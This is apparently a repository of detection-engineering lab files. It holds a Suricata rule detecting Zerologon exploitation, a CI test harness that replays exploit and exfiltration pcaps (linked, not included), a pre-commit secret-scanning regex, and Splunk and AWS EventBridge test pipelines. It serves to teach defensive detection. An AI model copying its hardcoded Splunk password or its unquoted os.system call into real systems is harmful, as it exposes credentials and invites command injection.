/chapter-05/lab-5.4/buildspec.csv:
--------------------------------------------------------------------------------
1 | './rules/test-exploit-zerologon.rules','ET EXPLOIT Possible Zerologon NetrServerAuthenticate','./tests/cve-2020-1472-exploit.pcap'
--------------------------------------------------------------------------------
/chapter-05/lab-5.4/rules/test-exploit-zerologon.rules:
--------------------------------------------------------------------------------
1 | alert tcp-pkt any any -> [$HTTP_SERVERS,$HOME_NET] ![139,445] (msg:"ET EXPLOIT Possible Zerologon NetrServerAuthenticate with 0x00 Client Credentials (CVE-2020-1472)"; flow:established,to_server; content:"|00|"; offset:2; content:"|1a 00|"; distance:19; within:2; content:"|5c 00 5c 00|"; within:50; content:"|24 00 00 00 06 00|"; distance:0; fast_pattern; content:"|00 00 00 00 00 00 00 00|"; distance:0; isdataat:!5,relative; threshold: type limit, count 5, seconds 30, track by_src; reference:url,www.secura.com/blog/zero-logon; reference:cve,2020-1472; classtype:attempted-admin; sid:2030871; rev:2; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, attack_target Server, created_at 2020_09_14, cve CVE_2020_1472, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, updated_at 2020_09_18;)
2 |
--------------------------------------------------------------------------------
/chapter-05/lab-5.4/suricata-rule-test-ci.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3
"""CI driver: run Suricata rule unit tests described by buildspec.csv."""
import csv, os, time, glob, sys
# Original pcaps pulled from https://github.com/CERTCC/PoC-Exploits/blob/master/cve-2020-1472/cve-2020-1472-exploit.pcap


def parse_buildspec_row(row):
    """Normalize one buildspec.csv row into (rule_file, rule_name, pcap).

    The buildspec wraps every field in single quotes, which csv.reader keeps
    as literal characters (its default quotechar is double-quote). The
    original code stripped the quotes only from the rule name, so the quoted
    rule/pcap paths were passed verbatim to suricata. Strip all three fields.
    """
    return tuple(field.strip().strip("'") for field in row[:3])


def main():
    # Parse buildspec.csv.
    # Format required: '/path/to/rule/file.rules','NAME OF RULE TO TEST','/path/to/pcap/test.pcap'
    with open('buildspec.csv') as csv_handle:
        for row in csv.reader(csv_handle):
            rule_file, rule_name, pcap = parse_buildspec_row(row)

            # Touch an empty fast.log even if suricata generates none, so the
            # validation logic below always has a file to read.
            open('fast.log', 'w').close()

            # Run suricata with only the rule file under test.
            os.system(f"suricata -c suricata-config.yml -r {pcap} -S {rule_file}")

            # Let the file system catch up.
            time.sleep(1)

            # Validation logic: the rule name must appear in the alert log.
            with open('fast.log', 'r', encoding='UTF-8') as file_handle:
                content = file_handle.read()
            if rule_name in content:
                print(f"PASSED: {rule_name} found in {pcap}")
            else:
                print(f"FAILED: {rule_name} not detected with {pcap}")
                sys.exit(1)

    # Clean up old files if this is self-hosted.
    for logfile in glob.glob('./*.log'):
        print('Deleting: ' + str(logfile))
        os.remove(logfile)


if __name__ == '__main__':
    main()
--------------------------------------------------------------------------------
/chapter-05/lab-5.4/suricata-unit-test-ci.yml:
--------------------------------------------------------------------------------
1 | name: Suricata Unit Tests for Signatures
2 |
3 | # Controls when the workflow will run
4 | on:
5 | push:
6 | branches: [ "main" ]
7 | paths:
8 | - tests/*.pcap
9 | - rules/*.rules
10 | - buildspec.csv
11 | pull_request:
12 | branches: [ "main" ]
13 |
14 | # Allows you to run this workflow manually from the Actions tab
15 | workflow_dispatch:
16 |
17 | #when running commit prior to a push you setup the cli parameters that should trigger a detection
18 | #env:
19 | #test_payload: ${{ github.event.head_commit.message }}
20 |
21 | permissions:
22 | contents: read # This is required for actions/checkout
23 |
24 | jobs:
25 | SuricataRuleUnitTests:
26 | # The type of runner that the job will run on
27 | runs-on: ubuntu-latest
28 | environment: production
29 | # Use the Bash shell regardless whether the GitHub Actions runner is ubuntu-latest, macos-latest, or windows-latest
30 | defaults:
31 | run:
32 | shell: bash
33 | steps:
34 | # Checks-out your repository under $GITHUB_WORKSPACE, so your job can access it
35 | - uses: actions/checkout@v4
36 |
37 | #deploy python and cache requirements
38 | - name: Setup Python Packages
39 | uses: actions/setup-python@v5
40 | with:
41 | python-version: '3.10'
42 | - name: Install Suricata
43 | run: |
44 | sudo apt install suricata -y
45 | - name: Run Unit Tests
46 | run: |
47 | python ./suricata-rule-test-ci.py
48 |
--------------------------------------------------------------------------------
/chapter-05/lab-5.4/tests/Exfiltration-DNS-CreditCard-903.pcap:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Automating-Security-Detection-Engineering/8a5013402dcf195508db9f5e95c1a79692256034/chapter-05/lab-5.4/tests/Exfiltration-DNS-CreditCard-903.pcap
--------------------------------------------------------------------------------
/chapter-05/lab-5.4/tests/Exfiltration-DNS-Sourcecode-903.pcap:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Automating-Security-Detection-Engineering/8a5013402dcf195508db9f5e95c1a79692256034/chapter-05/lab-5.4/tests/Exfiltration-DNS-Sourcecode-903.pcap
--------------------------------------------------------------------------------
/chapter-05/lab-5.4/tests/Infiltration-CVE-2016-4117-1329.pcap:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Automating-Security-Detection-Engineering/8a5013402dcf195508db9f5e95c1a79692256034/chapter-05/lab-5.4/tests/Infiltration-CVE-2016-4117-1329.pcap
--------------------------------------------------------------------------------
/chapter-05/lab-5.4/tests/Lateral-Movement-CVE-2023-21716-exploit.pcap:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Automating-Security-Detection-Engineering/8a5013402dcf195508db9f5e95c1a79692256034/chapter-05/lab-5.4/tests/Lateral-Movement-CVE-2023-21716-exploit.pcap
--------------------------------------------------------------------------------
/chapter-05/lab-5.4/tests/Lateral-Movement-Sabbath-ransomware.pcap:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Automating-Security-Detection-Engineering/8a5013402dcf195508db9f5e95c1a79692256034/chapter-05/lab-5.4/tests/Lateral-Movement-Sabbath-ransomware.pcap
--------------------------------------------------------------------------------
/chapter-05/lab-5.4/tests/cve-2020-1472-exploit.pcap:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Automating-Security-Detection-Engineering/8a5013402dcf195508db9f5e95c1a79692256034/chapter-05/lab-5.4/tests/cve-2020-1472-exploit.pcap
--------------------------------------------------------------------------------
/chapter-05/lab-5.5/bad-code.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | echo "nyan cat"
3 | API_SECRET='cdossrunrundossrun'
4 | ##
5 |
6 | #
--------------------------------------------------------------------------------
/chapter-05/lab-5.5/instructions.txt:
--------------------------------------------------------------------------------
1 | 1. Run git init
2 | 2. Run git config user.name and git config user.email
3 | 3. Copy pre-commit to .git/hooks/
4 | 4. Make the file executable: chmod +x .git/hooks/pre-commit
5 | 5. Make a change like an extra "#" to bad-code.sh
6 | 6. git add bad-code.sh
7 | 7. git commit -m "test hook"
--------------------------------------------------------------------------------
/chapter-05/lab-5.5/pre-commit:
--------------------------------------------------------------------------------
#!/bin/bash

# git grep is grep but scoped by default to your working commit dir
# https://man7.org/linux/man-pages/man1/grep.1.html#EXIT_STATUS
# https://git-scm.com/docs/git-grep
# https://pre-commit.com/#new-hooks

# Match KEY_SECRET='value' style assignments. The optional quote replaces the
# original literal '{' after '=', which could never match real code such as
# API_SECRET='cdossrunrundossrun' in bad-code.sh.
REGEX="SECRET=['\"]?\w{1,30}"


grepSecrets() {
    echo "Checking for potential secrets..."

    # "$REGEX" expands the variable; the original $(REGEX) was command
    # substitution of a nonexistent command, so git grep searched for an
    # empty pattern and matched everything.
    if git grep -E "$REGEX"; then
        echo "Potential secrets found!"
        exit 1
    else
        echo "No secrets found"
    fi
}

grepSecrets
--------------------------------------------------------------------------------
/chapter-06/lab-6.1/audit-example-log.txt:
--------------------------------------------------------------------------------
1 | type=SYSCALL msg=audit(1664132300.181:236): arch=c000003e syscall=59 success=yes exit=0 a0=7fffd11e5500 a1=7fffd11e4b50 a2=7fffd11e4c48 a3=0 items=0 ppid=3086 pid=3167 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=(none) ses=5 comm="sshd" exe="/usr/sbin/sshd" key=(null)
2 | type=USER_AUTH msg=audit(1664132300.181:237): user pid=3167 uid=0 auid=1000 ses=5 msg='op=PAM:authentication acct="jsmith" exe="/usr/sbin/sshd" hostname=? addr=? terminal=ssh res=success'
3 | type=USER_START msg=audit(1664132300.181:238): user pid=3167 uid=0 auid=1000 ses=5 msg='op=PAM:session_open acct="jsmith" exe="/usr/sbin/sshd" hostname=? addr=? terminal=ssh res=success'
4 | type=SYSCALL msg=audit(1664132305.181:239): arch=c000003e syscall=59 success=yes exit=0 a0=55b50fb0f330 a1=7fffd11e4b90 a2=7fffd11e4c88 a3=0 items=0 ppid=3167 pid=3169 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=(none) ses=5 comm="bash" exe="/usr/bin/bash" key=(null)
5 | type=CWD msg=audit(1664132305.181:240): cwd="/home/jsmith"
6 | type=PATH msg=audit(1664132305.181:241): item=0 name="/bin/ls" inode=131099 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 objtype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
7 | type=USER_END msg=audit(1664132420.246:242): user pid=3167 uid=0 auid=1000 ses=5 msg='op=PAM:session_close acct="jsmith" exe="/usr/sbin/sshd" hostname=? addr=? terminal=ssh res=success'
--------------------------------------------------------------------------------
/chapter-06/lab-6.1/buildspec.txt:
--------------------------------------------------------------------------------
1 | TEST_LOG:tests/audit-example-log.txt
2 | SPL_SEARCH:index=main exe=*bash
3 |
--------------------------------------------------------------------------------
/chapter-06/lab-6.1/spl-integration-test.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | ### ENTER IN TERMINAL ###
4 | # Ensure splunk is running sudo /opt/splunk/bin/splunk start
5 | # you will need to sudo your exports because of session swap
6 | # in a CI this is easier to run as root because of env variable injections
7 | # run sudo bash
8 | # export SPLUNK_USER=''
9 | # export SPLUNK_PASSWORD=''
10 |
11 | ### buildspec.txt format ###
12 | #TEST_LOG:/tmp/audit-example-log.txt
13 | #SPL_SEARCH:index=main jsmith
14 |
15 | #SPL_USER=$(env | grep SPLUNK_USER | cut -d '=' -f2)
16 | #SPL_PASSWORD=$(env | grep SPLUNK_PASSWORD | cut -d '=' -f2)
17 | SPL_LOG="$pwd$(cat ./buildspec.txt | grep TEST_LOG | cut -d ':' -f2)"
18 | SPL_SEARCH=$(cat ./buildspec.txt | grep SPL_SEARCH | cut -d ':' -f2)
19 |
20 | echo $SPL_LOG
21 | #echo "$SPLUNK_USER:$SPLUNK_PASSWORD"
22 | echo $SPL_SEARCH
23 |
24 | echo "Adding test log entry..."
25 |
26 | sudo /opt/splunk/bin/splunk add oneshot $SPL_LOG -index main -hostname 127.0.0.1 -sourcetype 'syslog:linux:auditd' -auth "$SPLUNK_USER:$SPLUNK_PASSWORD"
27 |
28 | echo "Waiting for indexing..."
29 | sleep 3
30 | echo "Testing search..."
31 |
32 | RESULTS=$(sudo /opt/splunk/bin/splunk search "$SPL_SEARCH" -app search -maxout 10 -output auto -timeout 120 | wc -l)
33 |
34 | echo "Found: $RESULTS"
35 |
36 | if [[ $RESULTS -gt 0 ]]; then
37 | echo "Test PASS."
38 | else
39 | echo "Test FAILED."
40 | sudo /opt/splunk/bin/splunk stop
41 | sudo /opt/splunk/bin/splunk clean eventdata -index main -f
42 | echo "restarting splunkd for future testing..."
43 | sudo /opt/splunk/bin/splunk start
44 | exit 1
45 | fi
46 |
47 | echo "cleaning up logs from index..."
48 | sleep 1
49 | echo "splunkd must stop before cleaning.."
50 | sudo /opt/splunk/bin/splunk stop
51 | sudo /opt/splunk/bin/splunk clean eventdata -index main -f
52 | echo "restarting splunkd for future tests..."
53 | sudo /opt/splunk/bin/splunk start
54 | exit 0
--------------------------------------------------------------------------------
/chapter-06/lab-6.1/spl-test-exp-backoff.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | ### ENTER IN TERMINAL ###
4 | # Ensure splunk is running sudo /opt/splunk/bin/splunk start
5 | # you will need to sudo your exports because of session swap
6 | # in a CI this is easier to run as root because of env variable injections
7 | # run sudo bash
8 | # export SPLUNK_USER=''
9 | # export SPLUNK_PASSWORD=''
10 |
11 | ### buildspec.txt format ###
12 | #TEST_LOG:/tmp/audit-example-log.txt
13 | #SPL_SEARCH:index=main jsmith
14 |
15 | #SPL_USER=$(env | grep SPLUNK_USER | cut -d '=' -f2)
16 | #SPL_PASSWORD=$(env | grep SPLUNK_PASSWORD | cut -d '=' -f2)
17 | SPL_LOG="$pwd$(cat ./buildspec.txt | grep TEST_LOG | cut -d ':' -f2)"
18 | SPL_SEARCH=$(cat ./buildspec.txt | grep SPL_SEARCH | cut -d ':' -f2)
19 |
20 | echo $SPL_LOG
21 | #echo "$SPLUNK_USER:$SPLUNK_PASSWORD"
22 | echo $SPL_SEARCH
23 |
24 | echo "Adding test log entry..."
25 |
26 | sudo /opt/splunk/bin/splunk add oneshot $SPL_LOG -index main -hostname 127.0.0.1 -sourcetype 'syslog:linux:auditd' -auth "$SPLUNK_USER:$SPLUNK_PASSWORD"
27 |
28 | echo "Waiting for indexing..."
29 | sleep 3
30 | echo "Testing search..."
31 |
32 | maxTries=3
33 | tries=1
34 | backoff=10
35 |
36 | while [ $tries -le $maxTries ]; do
37 |
38 | echo "Testing search attempt $tries..."
39 |
40 | RESULTS=$(sudo /opt/splunk/bin/splunk search "$SPL_SEARCH" -app search -maxout 10 -output auto -timeout 120 | wc -l)
41 |
42 | if [[ $RESULTS -gt 0 ]]; then
43 | echo "Test PASS."
44 | echo "Found: $RESULTS"
45 | break
46 | else
47 | echo "Test FAILED, retrying in $backoff seconds..."
48 | sleep $backoff
49 | ((backoff+=backoff))
50 | ((tries++))
51 | fi
52 |
53 | done
54 |
55 | if [ $tries -gt $maxTries ]; then
56 | echo "Search failed after $tries attempts"
57 | # cleanup and exit 1
58 | echo "Test FAILED."
59 | sudo /opt/splunk/bin/splunk stop
60 | sudo /opt/splunk/bin/splunk clean eventdata -index main -f
61 | echo "restarting splunkd for future testing..."
62 | sudo /opt/splunk/bin/splunk start
63 | exit 1
64 | fi
65 |
66 | echo "Found: $RESULTS"
67 |
68 | echo "cleaning up logs from index..."
69 | sleep 1
70 | echo "splunkd must stop before cleaning.."
71 | sudo /opt/splunk/bin/splunk stop
72 | sudo /opt/splunk/bin/splunk clean eventdata -index main -f
73 | echo "restarting splunkd for future tests..."
74 | sudo /opt/splunk/bin/splunk start
75 | exit 0
--------------------------------------------------------------------------------
/chapter-06/lab-6.1/splunk cli cmds.txt:
--------------------------------------------------------------------------------
1 | https://docs.splunk.com/Documentation/Splunk/latest/Data/MonitorfilesanddirectoriesusingtheCLI
2 | https://docs.splunk.com/Documentation/SplunkCloud/9.1.2308/SearchReference/AboutCLIsearches
3 |
4 | $SPLUNK_HOME/bin/splunk start --no-prompt
5 |
6 | ./splunk cmd python /opt/splunk/bin/scripts/oneshot \
7 | --index main \
8 | --source /home/ssm-user/Downloads/example-auditd-log.txt \
9 | --host 127.0.0.1
10 |
11 |
12 | /home/ssm-user/Downloads/example-auditd-log.txt
13 | sudo yum install expect -y
14 |
15 | ./splunk help add oneshot
16 | ./splunk add oneshot /home/ssm-user/Downloads/example-auditd-log.txt -index main -hostname 127.0.0.1 -sourcetype "syslog:linux:auditd"
17 |
18 | ----
19 |
20 |
21 | [root@ip-172-31-30-202 bin]# ./splunk add oneshot /home/ssm-user/Downloads/example-auditd-log.txt -index main -hostname 127.0.0.1 -sourcetype "syslog:linux:auditd"
22 | WARNING: Server Certificate Hostname Validation is disabled. Please see server.conf/[sslConfig]/cliVerifyServerName for details.
23 | Splunk username: admin
24 | Password:
25 | Oneshot '/home/ssm-user/Downloads/example-auditd-log.txt' added
26 | [root@ip-172-31-30-202 bin]#
27 |
28 |
29 | ---
30 |
31 | ----# Script #----
32 | #!/bin/bash
33 |
34 | username="admin"
35 | password="splunksplunk"
36 |
37 | # Turn off input echoing
38 | stty -echo
39 |
40 | # Run splunk command
41 | echo "$username" | /opt/splunk/bin/splunk add oneshot /home/ssm-user/Downloads/example-auditd-log.txt -index main -hostname 127.0.0.1 -sourcetype "syslog:linux:auditd"
42 |
43 | # Enter password via stdin pipe
44 | echo "$password"
45 |
46 | # Turn input echoing back on
47 | stty echo
48 |
49 | # Handle prompt
50 | yes | head -n1
51 |
52 |
53 | --- # search test # ---
54 |
55 | /opt/splunk/bin/splunk search 'index=main *jsmith* earliest=-4h' -app search -maxout 10 -output auto -timeout 120
--------------------------------------------------------------------------------
/chapter-06/lab-6.1/splunk debian download.txt:
--------------------------------------------------------------------------------
1 | wget -O splunk-9.1.2-b6b9c8185839-linux-2.6-amd64.deb "https://download.splunk.com/products/splunk/releases/9.1.2/linux/splunk-9.1.2-b6b9c8185839-linux-2.6-amd64.deb"
2 |
3 | wget -O splunk-9.1.2-b6b9c8185839.x86_64.rpm "https://download.splunk.com/products/splunk/releases/9.1.2/linux/splunk-9.1.2-b6b9c8185839.x86_64.rpm"
--------------------------------------------------------------------------------
/chapter-06/lab-6.1/splunk-spl-int-test.yml:
--------------------------------------------------------------------------------
1 | name: Splunk SPL Testing
2 |
3 | # Controls when the workflow will run
4 | on:
5 |   push:
6 |     branches: [ "main" ]
7 |     paths:
8 |       - tests/*.log
9 |       - tests/*.txt
10 |       - buildspec.txt
11 |   pull_request:
12 |     branches: [ "main" ]
13 |
14 |   # Allows you to run this workflow manually from the Actions tab
15 |   workflow_dispatch:
16 |
17 | #when running commit prior to a push you setup the cli parameters that should trigger a detection
18 | env:
19 |   #COMMIT_MESSAGE: ${{ github.event.head_commit.message }}
20 |   SPLUNK_USER: ${{ secrets.SPLUNK_USER }}
21 |   SPLUNK_PASSWORD: ${{ secrets.SPLUNK_PASSWORD }}
22 |   SUDO_PASSWORD: ${{ secrets.SUDO_PASSWORD }}
23 |
24 | permissions:
25 |   contents: read # This is required for actions/checkout
26 |
27 | jobs:
28 |   splRuleTests:
29 |     # The type of runner that the job will run on
30 |     #runs-on: Ubuntu-latest
31 |     runs-on: [self-hosted, splunk] #based on logical combination of labels
32 |     #environment: production
33 |     # Use the Bash shell regardless whether the GitHub Actions runner is ubuntu-latest, macos-latest, or windows-latest
34 |     defaults:
35 |       run:
36 |         shell: bash
37 |     steps:
38 |       # Checks-out your repository under $GITHUB_WORKSPACE, so your job can access it
39 |       - uses: actions/checkout@v4
40 |       #run SPL checks based on buildspec.txt
41 |       #depends on splunk already being installed and configured
42 |       - name: Set Root Privs
43 |         run: |
44 |           # a plain `export` only lives for the current step; writing to
45 |           # GITHUB_ENV makes the variable visible to every later step
46 |           echo "RUNNER_ALLOW_RUNASROOT=1" >> "$GITHUB_ENV"
47 |       - name: Check Splunk Status
48 |         run: |
49 |           # double quotes let the secret expand; the original single quotes
50 |           # piped the literal text $SUDO_PASSWORD to sudo
51 |           echo "$SUDO_PASSWORD" | sudo -S /opt/splunk/bin/splunk status
52 |           #find . -type f -print0 | xargs -0 dos2unix
53 |       - name: Run SPL Validation
54 |         run: |
55 |           echo "$SUDO_PASSWORD" | sudo -S chmod +x ./spl-integration-test.sh
56 |           dos2unix ./spl-integration-test.sh
57 |           dos2unix ./buildspec.txt
58 |           ./spl-integration-test.sh
59 |
--------------------------------------------------------------------------------
/chapter-06/lab-6.1/start-github-action-runner.sh:
--------------------------------------------------------------------------------
1 | #!/usr/bin/bash
2 | cd /home/dc/Downloads/actions-runner
3 | ./run.sh &
4 |
--------------------------------------------------------------------------------
/chapter-06/lab-6.1/tests/audit-example-log.txt:
--------------------------------------------------------------------------------
1 | type=SYSCALL msg=audit(1664132300.181:236): arch=c000003e syscall=59 success=yes exit=0 a0=7fffd11e5500 a1=7fffd11e4b50 a2=7fffd11e4c48 a3=0 items=0 ppid=3086 pid=3167 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=(none) ses=5 comm="sshd" exe="/usr/sbin/sshd" key=(null)
2 | type=USER_AUTH msg=audit(1664132300.181:237): user pid=3167 uid=0 auid=1000 ses=5 msg='op=PAM:authentication acct="jsmith" exe="/usr/sbin/sshd" hostname=? addr=? terminal=ssh res=success'
3 | type=USER_START msg=audit(1664132300.181:238): user pid=3167 uid=0 auid=1000 ses=5 msg='op=PAM:session_open acct="jsmith" exe="/usr/sbin/sshd" hostname=? addr=? terminal=ssh res=success'
4 | type=SYSCALL msg=audit(1664132305.181:239): arch=c000003e syscall=59 success=yes exit=0 a0=55b50fb0f330 a1=7fffd11e4b90 a2=7fffd11e4c88 a3=0 items=0 ppid=3167 pid=3169 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=(none) ses=5 comm="bash" exe="/usr/bin/bash" key=(null)
5 | type=CWD msg=audit(1664132305.181:240): cwd="/home/jsmith"
6 | type=PATH msg=audit(1664132305.181:241): item=0 name="/bin/ls" inode=131099 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 objtype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
7 | type=USER_END msg=audit(1664132420.246:242): user pid=3167 uid=0 auid=1000 ses=5 msg='op=PAM:session_close acct="jsmith" exe="/usr/sbin/sshd" hostname=? addr=? terminal=ssh res=success'
--------------------------------------------------------------------------------
/chapter-06/lab-6.2/cloudwatch-metrics-cli-query.txt:
--------------------------------------------------------------------------------
1 | aws cloudwatch get-metric-data \
2 | --metric-data-queries '[
3 | {
4 | "Id": "metricQuery",
5 | "MetricStat": {
6 | "Metric": {
7 | "Namespace": "AWS/Events",
8 | "MetricName": "MatchedEvents",
9 | "Dimensions": [
10 | {
11 | "Name": "RuleName",
12 | "Value": "iam-access-key-generated-rule"
13 | }
14 | ]
15 | },
16 | "Period": 300,
17 | "Stat": "Sum"
18 | }
19 | }
20 | ]' \
21 | --start-time "2024-01-17T00:00:00Z" \
22 | --end-time "2024-01-17T23:59:59Z"
--------------------------------------------------------------------------------
/chapter-06/lab-6.2/createAccessKeyPolicyCI.json:
--------------------------------------------------------------------------------
1 | {
2 | "Version": "2012-10-17",
3 | "Statement": [
4 | {
5 | "Sid": "VisualEditor0",
6 | "Effect": "Allow",
7 | "Action": [
8 | "events:DescribeRule",
9 | "iam:DeleteAccessKey",
10 | "events:EnableRule",
11 | "events:CreateApiDestination",
12 | "events:PutRule",
13 | "iam:UpdateAccessKey",
14 | "events:DescribeEventSource",
15 | "iam:CreateAccessKey",
16 | "events:DescribeEventBus",
17 | "cloudwatch:ListTagsForResource",
18 | "events:ListTagsForResource",
19 | "events:ListTargetsByRule",
20 | "events:DescribeApiDestination",
21 | "iam:ListAccessKeys"
22 | ],
23 | "Resource": [
24 | "arn:aws:events:*::connection/*",
25 | "arn:aws:events:*::rule/*/*",
26 | "arn:aws:events:*::api-destination/*",
27 | "arn:aws:events:*::event-bus/*",
28 | "arn:aws:events:*::event-source/*",
29 | "arn:aws:iam:::user/*",
30 | "arn:aws:cloudwatch:*::service/*-*",
31 | "arn:aws:cloudwatch:*::alarm:*",
32 | "arn:aws:cloudwatch:*::insight-rule/*",
33 | "arn:aws:cloudwatch:*::slo/*"
34 | ]
35 | },
36 | {
37 | "Sid": "VisualEditor1",
38 | "Effect": "Allow",
39 | "Action": [
40 | "events:ListRuleNamesByTarget",
41 | "cloudwatch:GetMetricData",
42 | "cloudwatch:DescribeAlarmsForMetric",
43 | "events:ListRules",
44 | "events:ListEventBuses",
45 | "cloudwatch:GetMetricStatistics",
46 | "cloudwatch:ListMetrics"
47 | ],
48 | "Resource": "*"
49 | },
50 | {
51 | "Sid": "VisualEditor2",
52 | "Effect": "Allow",
53 | "Action": [
54 | "events:DescribeRule",
55 | "events:EnableRule",
56 | "events:PutRule",
57 | "events:ListTagsForResource",
58 | "events:ListTargetsByRule"
59 | ],
60 | "Resource": "arn:aws:events:*::rule/"
61 | }
62 | ]
63 | }
--------------------------------------------------------------------------------
/chapter-06/lab-6.2/iam-access-key-generated-rule-CloudFormation-Template.yaml:
--------------------------------------------------------------------------------
1 | AWSTemplateFormatVersion: '2010-09-09'
2 | Description: CloudFormation template for EventBridge rule 'iam-access-key-generated-rule'
3 | Resources:
4 | EventRule0:
5 | Type: AWS::Events::Rule
6 | Properties:
7 | Description: Triggers when an IAM user creates an access key instead of using a role.
8 | EventBusName: default
9 | EventPattern:
10 | source:
11 | - aws.iam
12 | detail-type:
13 | - AWS API Call via CloudTrail
14 | detail:
15 | eventSource:
16 | - iam.amazonaws.com
17 | eventName:
18 | - CreateAccessKey
19 | Name: iam-access-key-generated-rule
20 | State: ENABLED
21 | Targets:
22 | - Id:
23 | Arn: arn:aws:sns:us-east-1::
24 |
--------------------------------------------------------------------------------
/chapter-06/lab-6.2/main.tf:
--------------------------------------------------------------------------------
1 | # Terraform 0.13+ uses the Terraform Registry:
2 |
3 | terraform {
4 | backend "s3" {
5 | bucket = ""
6 | key = "aws-eventbridge-rules-tfstate"
7 | region = "us-east-1"
8 | }
9 | required_providers {
10 | aws = {
11 | source = "hashicorp/aws"
12 | version = "5.32.1"
13 | }
14 | }
15 | }
16 |
17 | # Configure the AWS Provider
18 | provider "aws" {
19 | region = "us-east-1"
20 | }
21 |
22 | ### START EVENTBRIDGE RULES SECTION ###
23 |
24 | resource "aws_cloudwatch_event_rule" "iamKeyCreated" {
25 | name = "security-iam-access-key-generated"
26 | description = "An IAM user has generated an long-term access key credential."
27 | event_bus_name = "default"
28 | state = "ENABLED"
29 | tags = {
30 | Name = "project" #tags must be in tf "map" format as kv pairs
31 | Environment = "packt"
32 | }
33 | #user json encode function within tf to ensure proper parsing
34 | event_pattern = jsonencode(
35 | {
36 | "source" : ["aws.iam"],
37 | "detail-type" : ["AWS API Call via CloudTrail"],
38 | "detail" : {
39 | "eventSource" : ["iam.amazonaws.com"],
40 | "eventName" : ["CreateAccessKey"]
41 | }
42 | }
43 | )
44 | }
45 | #you must include a target as part of the rule or it wont do anything
46 | resource "aws_cloudwatch_event_target" "sns" {
47 | rule = aws_cloudwatch_event_rule.iamKeyCreated.name #.name relates to the above resource
48 | target_id = "eventbridge-emailme" #replace with your SNS topic
49 | arn = "arn:aws:sns:us-east-1::eventbridge-emailme" #replace with yours
50 | }
51 |
52 | ### END RULE RESOURCE SECTION ####
53 |
54 | /*
55 | #this is part of the example in the terraform provider documentation
56 | #realistically you wouldnt have this in the rule because your
57 | #states and stacks should be separate infrastructure, not rule management
58 |
59 | resource "aws_sns_topic" "aws_logins" {
60 | name = "aws-console-logins"
61 | }
62 |
63 | resource "aws_sns_topic_policy" "default" {
64 | arn = aws_sns_topic.aws_logins.arn
65 | policy = data.aws_iam_policy_document.sns_topic_policy.json
66 | }
67 |
68 | data "aws_iam_policy_document" "sns_topic_policy" {
69 | statement {
70 | effect = "Allow"
71 | actions = ["SNS:Publish"]
72 |
73 | principals {
74 | type = "Service"
75 | identifiers = ["events.amazonaws.com"]
76 | }
77 |
78 | resources = [aws_sns_topic.aws_logins.arn]
79 | }
80 | }
81 | */
--------------------------------------------------------------------------------
/chapter-06/lab-6.2/requirements.txt:
--------------------------------------------------------------------------------
1 | boto3==1.34.21
2 | botocore==1.34.21
3 | jmespath==1.0.1
4 | python-dateutil==2.8.2
5 | s3transfer==0.10.0
6 | six==1.16.0
7 | timedelta==2020.12.3
8 | urllib3==2.0.7
9 |
--------------------------------------------------------------------------------
/chapter-06/lab-6.2/tests/github-action-eventbridge-integration-testing.yml:
--------------------------------------------------------------------------------
1 | #uses github action runner with terraform and s3 backed state with oidc federation
2 | #deploys eventbridge rules and then checks for correct firing
3 | name: 'AWS EventBridge Integration Testing'
4 |
5 | on:
6 | push:
7 | branches: [ main ]
8 | pull_request:
9 | branches: [ main ]
10 | env:
11 | AWS_REGION : "us-east-1" #Change to reflect your Region
12 |
13 | permissions:
14 | contents: read
15 | id-token: write # This is required for requesting the JWT
16 |
17 | jobs:
18 | StaticTest-Rules-and-Deploy-Dynamic-Test:
19 |     name: 'Static Validate EventBridge Terraform and Deploy'
20 | runs-on: ubuntu-latest
21 | environment: production
22 |
23 | # Use the Bash shell regardless whether the GitHub Actions runner is ubuntu-latest, macos-latest, or windows-latest
24 | defaults:
25 | run:
26 | shell: bash
27 | steps:
28 | # Checkout the repository to the GitHub Actions runner
29 | - name: Checkout
30 | uses: actions/checkout@v4
31 | - name: configure aws credentials
32 | uses: aws-actions/configure-aws-credentials@v4
33 | with:
34 | role-to-assume: arn:aws:iam::599752704917:role/GithubOIDC-Actions-Role-WdBZFIFGsMUs #change to reflect your IAM role’s ARN
35 | role-session-name: GitHub_to_AWS_via_FederatedOIDC
36 | aws-region: ${{ env.AWS_REGION }}
37 | #deploy python and cache requirements
38 | - name: Setup Python Packages
39 | uses: actions/setup-python@v5
40 | with:
41 | python-version: '3.10'
42 | cache: 'pip'
43 | - run: pip install -r ./requirements.txt
44 | # Initialize a new or existing Terraform working directory by creating initial files, loading any remote state, downloading modules, etc.
45 | - name: Terraform Init
46 | run: terraform init
47 |
48 | # Checks that all Terraform configuration files adhere to a canonical format
49 | - name: Terraform Format
50 | run: terraform fmt
51 |
52 | # Self Lint
53 | - name: Terraform Validate
54 | run: terraform validate -no-color
55 |
56 | # Generates an execution plan for Terraform
57 | - name: Terraform Plan
58 | run: terraform plan -input=false
59 |
60 | # On push to "main", build or change infrastructure according to Terraform configuration files
